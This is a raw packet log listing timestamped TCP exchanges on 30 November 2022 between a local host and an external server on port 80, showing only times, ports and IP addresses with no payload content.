Nov 30, 2022 00:10:04.963546038 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963563919 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963572025 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963597059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963617086 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963628054 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963639975 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963673115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963673115 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963709116 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963710070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963741064 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963751078 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963773012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963793039 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963804960 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963819981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963836908 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963846922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963870049 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963886976 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963901043 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963913918 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963933945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963941097 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.963969946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.963979006 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964013100 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964024067 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964046001 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964065075 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964078903 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964087963 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964109898 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964128971 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964142084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964153051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964173079 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964181900 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964205027 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964216948 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964236975 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964247942 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964268923 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964287996 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964307070 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964345932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964364052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964364052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964379072 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964390993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964411974 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964443922 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964443922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964443922 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964472055 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964476109 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964508057 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964512110 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964540958 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964571953 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964575052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964575052 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964603901 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964629889 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964648008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964674950 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964674950 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964684010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964715958 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964718103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964749098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964777946 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964777946 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964781046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964806080 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964813948 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964844942 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964845896 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964878082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964907885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964907885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964910030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964942932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.964947939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.964987993 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965008974 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965008974 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965020895 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965054989 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965054989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965089083 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965118885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965118885 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965121031 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965152979 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965184927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965184927 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965184927 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965217113 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965248108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965246916 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965248108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965272903 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965281010 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965317965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965327024 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965356112 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965361118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965393066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965424061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965425968 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965457916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965461016 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965490103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965501070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965522051 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965538979 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965553999 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965567112 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965591908 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965605974 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965635061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965651989 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965692043 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965730906 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965734005 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965766907 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.965784073 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.965807915 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.966593981 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.995439053 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.995476007 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.995801926 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.995810032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.995851040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.995883942 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.995927095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.995934010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.995960951 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.995995045 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996006012 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996047020 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996047020 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996051073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996089935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996092081 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996119022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996124983 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996151924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996181965 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996191978 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996201992 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996221066 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996222019 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996248007 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996254921 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996274948 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996288061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996303082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996331930 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996335030 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996371031 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996537924 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996560097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996596098 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996632099 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996644974 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996673107 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996674061 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996709108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996711016 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996745110 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996748924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996782064 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996788025 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996820927 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996826887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996855974 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996865034 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996891022 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996892929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996920109 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996926069 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996948957 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.996962070 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.996975899 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.997004032 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.997009993 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.997031927 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:04.997035027 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:04.997361898 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.000667095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.000689030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.000713110 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.000777960 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.000848055 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.004270077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.004291058 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.004494905 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.004818916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.004846096 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.004872084 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.004889965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.004930973 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.004967928 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005003929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005070925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005084038 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005098104 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005150080 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005177021 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005177021 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005206108 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005229950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005239010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005239010 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005254030 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005284071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005291939 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005310059 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005310059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005336046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005356073 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005383015 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005403042 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005413055 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005433083 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005440950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005445004 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005470037 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005497932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005505085 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005518913 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005538940 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005542994 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005556107 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005569935 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005582094 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005593061 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005593061 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005618095 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005637884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005655050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005656958 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005656958 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005673885 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005686998 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005691051 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005709887 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005714893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005727053 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005753040 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005764961 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005779982 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005780935 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005809069 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005820990 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005831003 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005834103 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005852938 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005856991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005875111 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005883932 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005911112 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005939960 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005966902 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005986929 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.005987883 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.005987883 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.006004095 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.006006002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.006023884 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.006033897 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.006041050 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.006077051 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.006138086 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.006958008 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.006978035 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007009029 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007028103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007051945 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007074118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007097006 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007116079 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007118940 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007118940 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007133961 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007152081 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007153034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007153034 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007169962 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007172108 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007188082 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007211924 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007220030 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007240057 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007247925 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007266045 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007275105 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007285118 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007311106 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007417917 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007617950 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007635117 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007656097 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007672071 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007688046 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007698059 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007709026 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007716894 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007739067 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007761002 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007774115 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007791996 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007813931 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007829905 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007852077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007863998 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007868052 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.007895947 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.007927895 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008011103 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008027077 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008048058 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008059978 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008094072 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008217096 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008238077 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008277893 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008364916 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008609056 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008630991 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008646965 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008667946 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008682966 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008683920 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008699894 CET	80	49708	88.198.94.71	192.168.2.7
Nov 30, 2022 00:10:05.008702040 CET	49708	80	192.168.2.7	88.198.94.71
Nov 30, 2022 00:10:05.008721113 CET	49708	80	192.168.2.7	88.198.94.71
